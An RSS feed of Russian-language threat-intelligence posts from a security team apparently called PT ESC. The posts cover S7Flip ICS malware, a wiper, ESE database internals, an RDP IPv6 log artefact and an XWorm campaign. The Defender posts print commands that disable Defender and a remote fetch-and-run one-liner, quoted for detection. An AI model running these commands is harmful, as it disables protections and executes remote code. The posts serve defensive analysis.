<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>win &#8211; PT ESC</title>
	<atom:link href="/tag/win/feed/index.xml" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description></description>
	<lastBuildDate>Wed, 07 Oct 2026 11:55:56 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.1.3</generator>

<image>
	<url>/wp-content/uploads/2026/09/cropped-cropped-large_icon-32x32.png</url>
	<title>win &#8211; PT ESC</title>
	<link>/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Этот ваш Siemens&#8230;</title>
		<link>/this-is-siemens/</link>
		
		<dc:creator><![CDATA[global_author]]></dc:creator>
		<pubDate>Tue, 29 Sep 2026 18:38:28 +0000</pubDate>
				<category><![CDATA[Разное]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[win]]></category>
		<guid isPermaLink="false">/%d1%8d%d1%82%d0%be%d1%82-%d0%b2%d0%b0%d1%88-siemens/</guid>

					<description><![CDATA[Недавно наши коллеги из Центра промышленной экспертизы Позитива обнаружили на MalwareBazaar один любопытный Windows-образец. Вот его SHA-256: e014dadf6d93b312b93e2fc857791c241692da4015da7a24a4d42a946551add2 Наше внимание привлекло сообщение от аккаунта, с которого залили данный сэмпл: Хм, ICS-вредонос, причем…]]></description>
										<content:encoded><![CDATA[<p>Недавно наши коллеги из Центра промышленной экспертизы Позитива обнаружили на MalwareBazaar один любопытный Windows-образец. Вот его SHA-256:</p>
<pre><code>e014dadf6d93b312b93e2fc857791c241692da4015da7a24a4d42a946551add2</code></pre>
<p>Наше внимание привлекло сообщение от аккаунта, с которого залили данный сэмпл:</p>
<figure class="wp-block-image"><img fetchpriority="high" decoding="async" class="attachment-large size-large" src="/wp-content/uploads/2026/09/photo_636@29-09-2026_18-38-28-1024x291.jpg" sizes="auto, (max-width: 1024px) 100vw, 1024px" srcset="/wp-content/uploads/2026/09/photo_636@29-09-2026_18-38-28-1024x291.jpg 1024w, /wp-content/uploads/2026/09/photo_636@29-09-2026_18-38-28-300x85.jpg 300w, /wp-content/uploads/2026/09/photo_636@29-09-2026_18-38-28-768x218.jpg 768w, /wp-content/uploads/2026/09/photo_636@29-09-2026_18-38-28.jpg 1280w" alt="" width="1024" height="291" /></figure>
<p>Хм, ICS-вредонос, причем уже с готовым названием S7Flip (то есть нам даже не нужно напрягать свою фантазию, чтобы назвать его)? Звучит интересно! Давайте взглянем, что там внутри.</p>
<p>После закрепления в автозапуске под названием <code>aphp.exe</code> сэмпл начинает собирать адреса устройств в локальной сети — это адреса <code>192.168.*.*</code>, <code>10.*.*.*</code> и <code>172.*.*.*</code>, после чего проверяет на них наличие определенных открытых портов, которые широко используются промышленными устройствами:</p>
<ul>
<li><strong>102</strong> — в основном используют контроллеры Siemens для взаимодействия по протоколу S7Comm или S7Comm+.</li>
<li><strong>502</strong> — стандартный порт протокола Modbus TCP; его могут использовать устройства любых производителей.</li>
<li><strong>44818</strong> — в основном используют контроллеры Allen-Bradley (Rockwell) для взаимодействия по протоколу EtherNet/IP (CIP).</li>
</ul>
<p>Подключение к устройствам Allen-Bradley (Rockwell) фактически не работает. Реализация клиента для EtherNet/IP (CIP) отсутствует: ветка переиспользует Siemens-клиент и пытается подключиться по порту 102 как к контроллеру Siemens. С настоящим Allen-Bradley соединение не установится — воздействие на устройства, открывшие только порт 44818, не оказывается вовсе.</p>
<p>Определив нужные устройства, S7Flip подключается к ним и начинает применять один из деструктивных механизмов (или сразу оба).</p>
<h2>Механизм 1: «randomize» значений</h2>
<p>По S7Comm (порт 102): по очереди обходит блоки DB 1–10; для каждого выбирает случайное смещение 0–99, читает оттуда 4-байтовое целое, прибавляет случайное целое число от −10 до +10 и записывает обратно.</p>
<p>По Modbus TCP (порт 502): выбирает 16-битный holding-регистр по случайному адресу 0–99, читает текущее значение, прибавляет случайное целое число от −10 до +10 и записывает обратно.</p>
<h2>Механизм 2: инверсия битов (findAndModifyInputs)</h2>
<p>По S7Comm (порт 102): последовательно проходит первые 100 байтов в блоках DB 1–10: читает байт, меняет его младший бит на противоположный и записывает обратно.</p>
<p>По Modbus TCP (порт 502): последовательно проходит однобитовые ячейки записи (coils — дискретные выводы, команды, флаги) в диапазоне 0–255: читает бит, меняет на противоположный и записывает обратно.</p>
<p>Каждое изменение пишется в <code>logs.csv</code> рядом с исполняемым файлом и содержит пять колонок — время, тег, вендор, старое и новое значение.</p>
<figure class="wp-block-image"><img decoding="async" class="attachment-large size-large" src="/wp-content/uploads/2026/09/photo_637@29-09-2026_18-38-28.jpg" sizes="auto, (max-width: 539px) 100vw, 539px" srcset="/wp-content/uploads/2026/09/photo_637@29-09-2026_18-38-28.jpg 539w, /wp-content/uploads/2026/09/photo_637@29-09-2026_18-38-28-300x257.jpg 300w" alt="" width="539" height="461" /></figure>
<p>Помимо данного бинаря, мы также нашли еще один:</p>
<pre><code>88717716e54b35682a28d673764975d439a31ee194c85dfc619a15ea93ab1280</code></pre>
<p>По логике работы он ничем не отличается от рассмотренного ранее образца. Главное отличие заключается в том, что библиотека <code>libmodbus</code>, реализующая работу протокола Modbus, в <code>e014dadf6d93b312b93e2fc857791c241692da4015da7a24a4d42a946551add2</code> динамически слинкована, а в <code>88717716e54b35682a28d673764975d439a31ee194c85dfc619a15ea93ab1280</code> — статически.</p>
<p>В этот же день с этого же аккаунта <code>jeans</code>, помимо <code>e014dadf6d93b312b93e2fc857791c241692da4015da7a24a4d42a946551add2</code> (название файла — <code>Edge.exe</code>), был залит еще один бинарь:</p>
<pre><code>2c57c1a39933514c63b5a7b585f5948ead04b65e4df96fb595ccda84208c4aa0</code></pre>
<p>При ближайшем рассмотрении он оказался вайпером. При запуске он по-джентльменски спрашивает, не хотите ли вы установить Microsoft Edge:</p>
<figure class="wp-block-image"><img decoding="async" class="attachment-large size-large" src="/wp-content/uploads/2026/09/photo_638@29-09-2026_18-38-28.jpg" sizes="auto, (max-width: 807px) 100vw, 807px" srcset="/wp-content/uploads/2026/09/photo_638@29-09-2026_18-38-28.jpg 807w, /wp-content/uploads/2026/09/photo_638@29-09-2026_18-38-28-300x58.jpg 300w, /wp-content/uploads/2026/09/photo_638@29-09-2026_18-38-28-768x148.jpg 768w" alt="" width="807" height="156" /></figure>
<p>И если вы отказываетесь, то вайпер прекращает свою работу 😅</p>
<p>Но вот если вы соглашаетесь&#8230; то будьте готовы к «непредвиденным обстоятельствам». Вот их список:</p>
<ul>
<li>рекурсивное удаление всего содержимого папки <code>%USERPROFILE%\Desktop</code>;</li>
<li>там же будет создан файл <code>compiled-desktop</code>, который будет содержать ровно <code>1 048 576</code> случайных байт;</li>
<li>ну и, разумеется, файл <code>README.txt</code> с вежливой просьбой перевести биткоины в размере 100 долларов.</li>
</ul>
<p>После всего этого вредонос добавляет себя в автозапуск.</p>
<p>Расшифровка файлов не предусмотрена: содержимое рабочего стола нигде не сохраняется. Это псевдовымогатель-вайпер.</p>
<p>Самое интересное, что в <code>README.txt</code> указан кошелек, на который злоумышленники предлагают переслать деньги: <code>bc1qp6ejw8ptj9l9pkscmlf8fhhkrrjeawgpyjvtq8</code> — это официальный кошелек для донатов проекта <code>Bitcoin.org</code>. Т. е. жулики на самом деле не хотят выкупа? Хм, интересно&#8230; 🤑</p>
<p>Чуть позже <code>jeans</code> залил еще один вариант данного инструмента — <code>f47502628708300840efe2771a3c5e7e9a631205512f0a2ee6382a00a92056e2</code>, причем на этот раз файл называется не <code>Edge.exe</code>, а <code>Edgev5.exe</code>.</p>
<p>Обозначает ли v5 какое-то развитие или дальнейшее улучшение вредоноса? Да, в новой версии автор добавил симметричное шифрование файлов с помощью AES-256-GCM, а также расширил количество папок для шифрования: теперь помимо Desktop шифрованию подлежат Downloads и Documents. Правда, есть один нюанс&#8230; ключ для расшифрования данных находится в файле <code>master_key.dat</code>, да и биткоин-кошелек такой же, как и в более ранней версии вайпера.</p>
<p>По всей видимости, автор вредоноса активно развивает и тестирует свой инструмент. Возможно, в будущем он начнет активно применять его в «боевом» виде.</p>
<h2>А какая связь между S7Flip и вайперами? 🧐</h2>
<p>В ходе чтения данного поста у вас, возможно, возник вопрос: «а как связаны S7Flip и вайпер между собой?» И на самом деле определенные совпадения есть:</p>
<ul>
<li>все бинари были собраны с помощью тулчейна GCC 16.2.0;</li>
<li>timestamp сборки PE-файлов <code>88717716e54b35682a28d673769475d439a31ee194c85dfc619a15ea93ab1280</code> (S7Flip) и <code>2c57c1a39933514c63b5a7b585f5948ead04b65e4df96fb595ccda84208c4aa0</code> (<code>Edge.exe</code>) совпадает с точностью до дня — 2026-09-13;</li>
<li>общий аккаунт, с которого файлы были залиты на MalwareBazaar, — <code>jeans</code>.</li>
</ul>
<p>Достаточно ли этих данных, чтобы утверждать, что S7Flip и вайперы разработаны одним и тем же автором? Нет, определенные сомнения все равно остаются, но некоторая взаимосвязь все же есть.</p>
<h2>IoCs</h2>
<table>
<tbody>
<tr>
<th>SHA-256</th>
<th>Имя</th>
<th style="text-align: center;">PT Fusion</th>
</tr>
<tr>
<td><code>88717716e54b35682a28d673769475d439a31ee194c85dfc619a15ea93ab1280</code></td>
<td>S7Flip</td>
<td style="text-align: center;"><a href="https://fusion.ptsecurity.com/shared/iocs/c4cb038a-718a-4509-a22a-151d0ebf310a" target="_blank" rel="noopener">Открыть ↗</a></td>
</tr>
<tr>
<td><code>e014dadf6d93b312b93e2fc857791c241692da4015da7a24a4d42a946551add2</code></td>
<td>S7Flip</td>
<td style="text-align: center;"><a href="https://fusion.ptsecurity.com/shared/iocs/3ca9e76f-e2d8-4da7-85ed-4c950bb25d26" target="_blank" rel="noopener">Открыть ↗</a></td>
</tr>
<tr>
<td><code>2c57c1a39933514c63b5a7b585f5948ead04b65e4df96fb595ccda84208c4aa0</code></td>
<td>Edge.exe (ver 1)</td>
<td style="text-align: center;"><a href="https://fusion.ptsecurity.com/shared/iocs/ebdd1e1e-02e6-4b42-adf3-d7ca2356cde2" target="_blank" rel="noopener">Открыть ↗</a></td>
</tr>
<tr>
<td><code>f47502628708300840efe2771a3c5e7e9a631205512f0a2ee6382a00a92056e2</code></td>
<td>Edgev5.exe</td>
<td style="text-align: center;"><a href="https://fusion.ptsecurity.com/shared/iocs/e50f6bc0-5e19-4ea5-8460-5840e32ec2ec" target="_blank" rel="noopener">Открыть ↗</a></td>
</tr>
</tbody>
</table>
<p><span class="hashtag">#malware</span> <span class="hashtag">#win</span> <span class="hashtag">#ioc</span><br />
<a href="https://t.me/ptescalator" target="_blank" rel="noopener">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Заглядываем внутрь ESE</title>
		<link>/a-look-inside-ese/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Fri, 19 Jun 2026 14:20:09 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[tips]]></category>
		<category><![CDATA[win]]></category>
		<guid isPermaLink="false">/%d0%b7%d0%b0%d0%b3%d0%bb%d1%8f%d0%b4%d1%8b%d0%b2%d0%b0%d0%b5%d0%bc-%d0%b2%d0%bd%d1%83%d1%82%d1%80%d1%8c-ese/</guid>

					<description><![CDATA[Заглядываем внутрь ESE 🫣 В ходе расследования инцидентов мы в PT ESC IR регулярно сталкиваемся с необходимостью анализа баз данных в формате ESE (Extensible Storage Engine), поскольку в подобных артефактах можно найти…]]></description>
										<content:encoded><![CDATA[<p><strong>Заглядываем внутрь ESE</strong> 🫣</p>
<p>В ходе расследования инцидентов мы в PT ESC IR регулярно сталкиваемся с необходимостью анализа баз данных в формате ESE (Extensible Storage Engine), поскольку в подобных артефактах можно найти много интересного.</p>
<p>Чтобы эффективнее работать с такими файлами, важно понимать, как этот формат устроен изнутри. Поэтому по итогам исследования мы подготовили подробный разбор внутреннего устройства ESE (также известного как Jet Blue) — встроенной СУБД от Microsoft, которая используется во многих продуктах компании. </p>
<p>В статье рассказываем, как на низком уровне организовано хранение данных, как устроены страницы и записи, а также разбираем особенности реализации движка, которые могут быть полезны при анализе содержимого БД и разработке собственных парсеров для работы с такими файлами.</p>
<p>🫱 Подробности — <a href="https://habr.com/ru/companies/pt/articles/1048794/" rel="noopener" target="_blank">на Хабре</a>.</p>
<p><span class="hashtag">#ir</span> <span class="hashtag">#dfir</span> <span class="hashtag">#win</span> <span class="hashtag">#tip</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>::%16777216 — так что же ты такое?</title>
		<link>/777216-so-what-exactly-are-you/</link>
		
		<dc:creator><![CDATA[global_author]]></dc:creator>
		<pubDate>Thu, 18 Jun 2026 14:11:09 +0000</pubDate>
				<category><![CDATA[Разное]]></category>
		<category><![CDATA[tips]]></category>
		<category><![CDATA[win]]></category>
		<guid isPermaLink="false">/%16777216-%d1%82%d0%b0%d0%ba-%d1%87%d1%82%d0%be-%d0%b6%d0%b5-%d1%82%d1%8b-%d1%82%d0%b0%d0%ba%d0%be%d0%b5/</guid>

					<description><![CDATA[::%16777216 — так что же ты такое? Известно, что в ходе атак злоумышленники могут использовать туннелирование. Например, прокинуть обратный туннель со взломанного Windows-хоста в глубине сети организации, чтобы с его помощью легко…]]></description>
										<content:encoded><![CDATA[<p><strong>::%16777216 — так что же ты такое?</strong></p>
<p>Известно, что в ходе атак злоумышленники могут использовать <a href="https://attack.mitre.org/techniques/T1572/" rel="noopener" target="_blank">туннелирование</a>. Например, прокинуть обратный туннель со взломанного Windows-хоста в глубине сети организации, чтобы с его помощью легко подключиться интерактивно по RDP к этому же хосту.</p>
<p>Методы выявления такой активности также известны. Например, стоит обязательно обращать внимание на наличие в логах IP-адресов <code>127.0.0.1</code> или <code>::1</code> в качестве источника — именно с таких адресов в пределах атакованной системы могут устанавливаться подключения к целевым сервисам.</p>
<p>😳 Много лет специалисты, расследовавшие взломы, отмечали и описывали в отчетах, что когда в подобных атаках для туннеля использовался ngrok, при подключении по RDP в логах вместо IP-адреса источника заносилось странное значение — <code>::%16777216</code>.</p>
<p>С одной стороны, это отличный артефакт, который легко искать: он вряд ли встречается в нормальной активности и поэтому его наличие служит хорошим и довольно точным индикатором атаки.</p>
<p>Но, с другой стороны, нигде не было понятного объяснения, что это за «магическое число», почему именно оно возникает в логах и всегда ли это признак использования именно ngrok.</p>
<p>😎 <strong>Мы решили разобраться, и нам удалось получить ответы:</strong></p>
<p>🔴 <code>::%16777216</code> появляется в логах в событии <code>1149</code> (а еще <code>4778</code> и <code>4779</code>) вместо IP-адреса <code>::1</code> в результате ошибки в Windows.</p>
<p>🔴 Ошибка не связана с наличием какой-либо уязвимости, а вызвана несогласованной интерпретацией данных в памяти разными модулями протокола RDP</p>
<p>🔴 Ошибка возникает не только с адресом <code>::1</code>, но и в любом другом случае, когда происходит подключение к RDP с использованием протокола IPv6 (например, вместо адреса <code>fe80::6e1d:980d:9401:719b</code> вы увидите в логах строку <code>0:0:fe80::6e1d:980d%2607874452</code>)</p>
<p>🔴 Проблема чаще всего связывалась с утилитой ngrok, так как в ходе туннелирования она создает подключение на узле с использованием IPv6 по умолчанию, в отличие от многих других утилит, которые используют IPv4.</p>
<p>🔴 Адрес в логах «портится» не безвозвратно, его можно восстановить:</p>
<p><strong>1.</strong> Взять значение из лога: <code>0:0:fe80::6e1d:980d%2607874452</code></p>
<p><strong>2. </strong>Часть после <code>%</code> перевести в HEX: <code>2607874452 dec = 9b710194 hex</code></p>
<p><strong>3.</strong> Убрать слева два нуля, дописать справа полученные цифры с учетом обратного порядка байт: <code>fe80::6e1d:980d:9401:719b</code></p>
<p>Ошибка существовала как минимум начиная с Windows Server 2012 R2 во всех версиях Windows. В начале лета 2025 года мы направили информацию об этом в Microsoft, и результаты недавних тестов показывают, что в актуальных версиях (с майскими обновлениями 2026 года) ошибка была исправлена (ответа о факте исправления мы не получили).</p>
<p>А о нюансах исследования, интересных подробностях представления IP-адресов и подходах к проведению экспериментов, которые помогли найти объяснение, автор рассказал в докладе на прошедшей в мае конференции ËPRSTCON — запись доклада, презентацию и расшифровку ищите <a href="https://www.yoprstcon.ru/articles_manual_locB_html/07-ngrok-windows.html" rel="noopener" target="_blank">на сайте конференции</a>.</p>
<p><strong>И что же теперь делать?</strong> 😨</p>
<p>1️⃣ В старых версиях Windows, которые уже не получают обновлений, продолжать обращать внимание на <code>::%16777216</code> в логах.</p>
<p>2️⃣ В актуальных версиях Windows, где, возможно, были установлены обновления, дополнительно проверять на наличие <code>::1</code> там, где такого адреса не должно быть в норме.</p>
<p>3️⃣ Учитывайте, что есть множество различных утилит для создания туннелей, и подобный индикатор никак не подтверждает использование именно ngrok.</p>
<p>0️⃣ По желанию — доработайте свой парсинг логов так, чтобы восстанавливать нормальный IP-адрес: это поможет учитывать адрес в корреляционных правилах и получать больше релевантных результатов при ретроспективном поиске событий или тредхантинге.</p>
<p><strong>P.S.: </strong>и не забывайте обращать внимание на появление <code>127.0.0.1</code> в неподходящих местах. </p>
<p><strong>P.P.S.:</strong> и не только <code>127.0.0.1</code>, а любого адреса из сети <code>127.0.0.0/8</code>: все эти адреса соответствуют интерфейсу <code>localhost</code> согласно <a href="https://datatracker.ietf.org/doc/html/rfc5735" rel="noopener" target="_blank">RFC5735</a>, и это работает во всех популярных ОС. Использовать как источник адрес типа <code>127.0.13.37</code> у злоумышленника вряд ли легко получится, а вот указывать в качестве назначения подобные адреса для подключения к процессам на локальном хосте — вполне.</p>
<p><span class="hashtag">#tip</span> <span class="hashtag">#win</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Отключение Defender / MpPreference</title>
		<link>/disabling-defender-mppreference/</link>
		
		<dc:creator><![CDATA[ti_author]]></dc:creator>
		<pubDate>Fri, 05 Dec 2025 17:00:47 +0000</pubDate>
				<category><![CDATA[Threat Intelligence]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[Phishing]]></category>
		<category><![CDATA[TI]]></category>
		<category><![CDATA[win]]></category>
		<guid isPermaLink="false">http://localhost:8080/%d0%be%d1%82%d0%ba%d0%bb%d1%8e%d1%87%d0%b5%d0%bd%d0%b8%d0%b5-defender-mppreference/</guid>

					<description><![CDATA[В дополнение к посту 👆 Отключение Defender / MpPreference Модификация Defender через reg.exe Defendnot IoCs: #TI #Phishing #malware #win @ptescalator]]></description>
										<content:encoded><![CDATA[В дополнение к <a href="https://t.me/ptescalator/568" rel="noopener" target="_blank">посту</a> 👆 <br />
<br />
<strong>Отключение Defender / MpPreference

</strong><pre class="wp-block-code"><span><code lang="powershell" class="hljs language-powershell language-powershell"><span class="hljs-built_in">Set-MpPreference</span> <span class="hljs-literal">-DisableRealtimeMonitoring</span> <span class="hljs-variable">$true</span>
<span class="hljs-built_in">Set-MpPreference</span> <span class="hljs-literal">-DisableBehaviorMonitoring</span> <span class="hljs-variable">$true</span>
<span class="hljs-built_in">Set-MpPreference</span> <span class="hljs-literal">-DisableBlockAtFirstSeen</span> <span class="hljs-variable">$true</span>
<span class="hljs-built_in">Set-MpPreference</span> <span class="hljs-literal">-DisableIOAVProtection</span> <span class="hljs-variable">$true</span>
<span class="hljs-built_in">Set-MpPreference</span> <span class="hljs-literal">-DisableScriptScanning</span> <span class="hljs-variable">$true</span>
<span class="hljs-built_in">Add-MpPreference</span> <span class="hljs-literal">-ExclusionPath</span> <span class="hljs-string">'C:\ProgramData'</span>
<span class="hljs-built_in">Add-MpPreference</span> <span class="hljs-literal">-ExclusionPath</span> <span class="hljs-variable">$env:USERPROFILE</span><span class="hljs-string">'\Downloads'</span></code></span></pre><br />
<br />
<strong>Модификация Defender через reg.exe

</strong><pre class="wp-block-code"><span><code lang="plaintext" class="hljs language-plaintext language-plaintext">reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f
reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f
reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f</code></span></pre><br />
<br />
<strong>Defendnot</strong> <br />
<br />
<pre class="wp-block-code"><span><code lang="yaml" class="hljs language-yaml language-yaml"><span class="hljs-comment">#Директория по умолчанию</span>
<span class="hljs-string">C:\Prorgam</span> <span class="hljs-string">Files\defendnot\</span>

<span class="hljs-comment">#Скачивание и запуск Defendnot</span>
<span class="hljs-string">irm</span> <span class="hljs-string">https://dnot.sh/</span> <span class="hljs-string">|</span> <span class="hljs-string">iex</span>

<span class="hljs-comment">#Запуск Defendnot в скрытном режиме и добавление задачи в автозагрузку из-под текущего пользователя</span>
<span class="hljs-string">"C:\Program Files\defendnot\defendnot-loader.exe"</span> <span class="hljs-string">--silent</span> <span class="hljs-string">--autorun-as-user</span></code></span></pre><br />
<br />
<strong>IoCs</strong>:<br />
<br />
<pre class="wp-block-code"><span><code lang="yaml" class="hljs language-yaml language-yaml"><span class="hljs-string">Defendnot</span>
<span class="hljs-string">dnot.sh</span> 
<span class="hljs-string">734d301654affee77396b554ccb04e0e</span>
<span class="hljs-string">752e74a143212b9779aa98ec6f736bac</span>

<span class="hljs-string">C2</span> <span class="hljs-string">XWorm</span>
<span class="hljs-string">tcp.cloudpub.ru:56409</span>
<span class="hljs-string">fair-equation.gl.at.ply.gg:57489</span>

<span class="hljs-string">lnk-файлы</span>
<span class="hljs-string">aebad92d84ae4f4b64748bc94798d401</span>
<span class="hljs-string">abd0364a25d1e7ee2bc9320c74e125fc</span>

<span class="hljs-string">powershell-файлы</span>
<span class="hljs-string">087dbfed9667fb870af265aed35f82e3</span>
<span class="hljs-string">ef7b11685c154e54deaf5c26f6d8ea59</span>
<span class="hljs-string">85a98d0f58cf08cb7206286b51312661</span>

<span class="hljs-string">vbs\vbe-файлы</span>
<span class="hljs-string">0bbccecdd13c7b9c4af3273b1ae8e133</span>
<span class="hljs-string">ebcb3e0d61ed5774d4e336f5e96ee9b4</span> 
<span class="hljs-string">9c5a00fe40783497752bcfbd75937fa7</span>
<span class="hljs-string">3ec80f2d06dd8f6a8e60d0e8753255e7</span>  

<span class="hljs-string">xWorm</span>
<span class="hljs-string">48bed9e98053e1e3ce0d4fb21fda2804</span> 
<span class="hljs-string">cab6f558f996db5a80e2a3bd5d443154</span> 
<span class="hljs-string">82294c916ba0ab95382509f51724716a</span> 
<span class="hljs-string">092712dc61fce5ef0ad0ddebb90059be</span></code></span></pre><br />
<br />
<span class="hashtag">#TI</span> <span class="hashtag">#Phishing</span> <span class="hashtag">#malware</span> <span class="hashtag">#win</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a>]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Использование DefendNot в атаках с XWorm</title>
		<link>/using-defendnot-in-xworm-attacks/</link>
		
		<dc:creator><![CDATA[ti_author]]></dc:creator>
		<pubDate>Fri, 05 Dec 2025 16:58:38 +0000</pubDate>
				<category><![CDATA[Threat Intelligence]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[Phishing]]></category>
		<category><![CDATA[TI]]></category>
		<category><![CDATA[win]]></category>
		<guid isPermaLink="false">http://localhost:8080/%d0%b8%d1%81%d0%bf%d0%be%d0%bb%d1%8c%d0%b7%d0%be%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-defendnot-%d0%b2-%d0%b0%d1%82%d0%b0%d0%ba%d0%b0%d1%85-%d1%81-xworm/</guid>

					<description><![CDATA[Использование DefendNot в атаках с XWorm 🪱 Группа киберразведки зафиксировала фишинговую активность, целью которой являлась кража данных с последующим вымогательством денежных средств (скриншот 1). В ходе анализа были идентифицированы две параллельно используемые…]]></description>
										<content:encoded><![CDATA[<strong>Использование DefendNot в атаках с XWorm</strong> 🪱<br />
<br />
Группа киберразведки зафиксировала фишинговую активность, целью которой являлась кража данных с последующим вымогательством денежных средств (<em>скриншот 1</em>). В ходе анализа были идентифицированы две параллельно используемые злоумышленниками цепочки доставки, различающиеся по начальному вектору, но сходящиеся на единой инфраструктуре и финальном вредоносном компоненте.<br />
<br />
🌹 <strong>Отдельно примечателен выбор инфраструктуры:</strong> для распространения компонентов используется GitHub-репозиторий <a href="https://github.com/andezzzWW/death-note" rel="noopener" target="_blank">death-note.</a> Забавно, что автор отсылает к известному произведению Death Note, где старшеклассник получает в руки особую тетрадь.<br />
<br />
<strong>•</strong> <strong>В первой цепочке в качестве первичного стейджа использовались VBScript-файлы</strong> (<em>скриншот 2</em>), содержащие обфусцированный скрипт. После запуска жертвой VBS-файла происходило скачивание с GitHub-репозитория злоумышленника текстового файла-приманки (<em>скриншот 3</em>) и его запуск для создания видимости легитимного процесса, а также выгрузка и запуск вредоносного VBE-скрипта «<code>SCRRC4ryuk.vbe</code>» (<em>скриншот 4</em>).<br />
<br />
Указанный скрипт выполнял деактивацию средств защиты Windows, в том числе Microsoft Defender с использованием проекта <strong>DefendNot</strong>, а также дропал и запускал дополнительный модуль <code>telegram_worker.vbs</code>, отвечающий за скрытую съемку экрана и отправку скриншотов в Telegram с использованием API и бота. Дополнительно перед запуском DefendNot злоумышленники выполняли ряд PowerShell-команд, таких как <code>Set-MpPreference</code> и <code>Add-MpPreference</code>, для отключения механизмов защиты и добавления в исключения каталогов, где размещаются и запускаются вредоносы.<br />
<br />
После этого запускался DefendNot, который регистрирует фиктивный антивирус через Windows Security Center и переводит Defender в отключенное состояние штатными средствами ОС. Завершающим этапом из того же репозитория загружался и запускался исполняемый файл, идентифицированный как <strong>XWorm RAT</strong>.<br />
<br />
<strong>•</strong> <strong>Во второй цепочке в начальном стейдже использовались LNK-файлы. </strong>Ярлык либо напрямую загружал и исполнял PowerShell-скрипт из GitHub-репозитория, либо выполнял эквивалентную команду в Base64-представлении (<em>скриншот 4</em>). Запущенный PowerShell-скрипт (<em>скриншот 5</em>) создавал текстовый файл, заполнял его псевдослужебным (<em>скриншот 3</em>) содержимым и открывал для пользователя, маскируя вредоносную активность под офисный документооборот. После этого скрипт загружал из того же GitHub-репозитория файл <code>SCRRC4ryuk.vbe</code> с последующим запуском. Дальнейшие стадии полностью совпадают с первой цепочкой и также приводят к развертыванию XWorm RAT на рабочей станции жертвы.<br />
<br />
🕵️ Изучив метаданные семплов XWorm, нам удалось обнаружить более ранние атаки, датируемые концом сентября, где вместо GitHub-репозитория распространение ВПО осуществлялось через облачные файловые хранилища, такие как Dropbox, Box и Яндекс.Диск. Это может свидетельствовать об эволюции инфраструктуры распространения и постепенном смещении акцента в сторону GitHub как удобной и менее подозрительной для пользователя площадки доставки.<br />
<br />
💡 <strong>Отдельного внимания заслуживает использование </strong><a href="https://github.com/es3n1n/defendnot" rel="noopener" target="_blank">DefendNot.</a> Изначально он позиционируется как открытый PoC-проект, демонстрирующий возможность регистрации фиктивного антивируса в Windows Security Center и последующего штатного отключения Microsoft Defender без эксплуатации уязвимостей. Базовый сценарий установки и запуска сводится к однострочной команде PowerShell вида:<br />
<br />
<pre class="wp-block-code"><span><code lang="plaintext" class="hljs language-plaintext language-plaintext">irm https://dnot.sh/ | iex</code></span></pre><br />
<br />
С ее помощью загружается установочный скрипт, скачивается и распаковывается архив, после чего PoC разворачивается в каталоге <code>C:\Program Files\defendnot</code>\ и запускается. В процессе работы DefendNot добавляет себя в автозагрузку текущего пользователя, сохраняя эффект отключения Defender после перезагрузки.<br />
<br />
На практике подобные инструменты ранее практически не встречались в реальных атаках, поэтому задокументированное использование DefendNot в кампании указывает на растущую заинтересованность злоумышленников в переиспользовании публичных исследовательских разработок для отключения встроенных средств защиты.

<figure class="wp-block-image"><img width="1024" height="721" src="/wp-content/uploads/2025/12/photo_445@05-12-2025_16-58-39-1024x721.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/12/photo_445@05-12-2025_16-58-39-1024x721.jpg 1024w, /wp-content/uploads/2025/12/photo_445@05-12-2025_16-58-39-300x211.jpg 300w, /wp-content/uploads/2025/12/photo_445@05-12-2025_16-58-39-768x541.jpg 768w, /wp-content/uploads/2025/12/photo_445@05-12-2025_16-58-39.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
